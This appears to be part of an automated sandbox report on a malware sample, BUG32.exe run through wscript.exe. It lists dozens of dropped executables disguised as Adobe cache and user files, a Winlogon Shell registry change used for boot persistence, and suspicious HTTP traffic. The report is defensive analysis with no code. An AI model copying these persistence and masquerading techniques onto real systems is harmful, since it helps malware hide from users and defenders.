    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8182259827.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Bing.urlJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile created: C:\Users\user\AppData\Local\Temp\6C7D10EA.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journalJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresourceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\jones.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\GIGIYTFFYT.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Twitter.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.docxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2567238426.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\MANIFEST-000001.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\CZQKSDDMWR.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\4478492829.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\3476888679.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.exeJump to dropped file
    Source: C:\Users\user\Desktop\BUG32.exeFile created: C:\Users\user\AppData\Local\Temp\aJEWGt.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1237160943.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.binJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7676687441.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0653671941.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\BUG32.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\2585558601.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\BUG32\jsc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOCK.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wct42C5.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1206337459.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\_curlrc.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\cv_debug.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\NYTimes.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\user-PC-20231004-1445.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\wct1834.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7847944919.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8886835349.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6092905029.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0196354653Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8975065801.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0518291756Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\6329227256.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\PALRGUCVEH.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5064077962.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\aJEWGt.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\5491630718.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOGJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\8995528179.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\9329238007.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\7155756679.exeJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jcpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Comms\UnistoreDB\USS.jtxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\offline.session64Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Live.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\NYTimes.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Reddit.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Twitter.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Wikipedia.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Youtube.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Links\Desktop.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Links\Downloads.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEventsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEIDJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_SurfaceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_BannerJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_RetentionJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.jsonJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-msJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOGJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Bluetooth File Transfer.LNKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTargetJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLinkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited LinksJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Documents.mydocsJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnkJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\CookiesJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMailJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journalJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent StateJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\Connected Devices Platform certificates.sstJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresourceJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\.sesJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0164771190Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0196354653Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0409654664Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0450125302Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0518291756Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0653671941Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\0982390758Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1033868256Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1141274626Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\.curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\_curlrcJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\1206337459Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-indexJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.logJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENTJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCKJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.oldJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Desktop\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Documents\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\BJZFPPWAPT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\CZQKSDDMWR.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\DUUDTUBZFW.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EIVQSAOTAQ.jpgJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EOWRVPQCCS.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\EWZCVGNOWT.pdfJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\GIGIYTFFYT.pngJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\GRXZDKKVDB.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\PALRGUCVEH.xlsxJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Downloads\TQDFJHPUIU.mp3Jump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Amazon.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Bing.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Facebook.urlJump to dropped file
    Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\Favorites\Google.urlJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\System32\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: C:\Users\user\Desktop\BUG32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\BUG32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
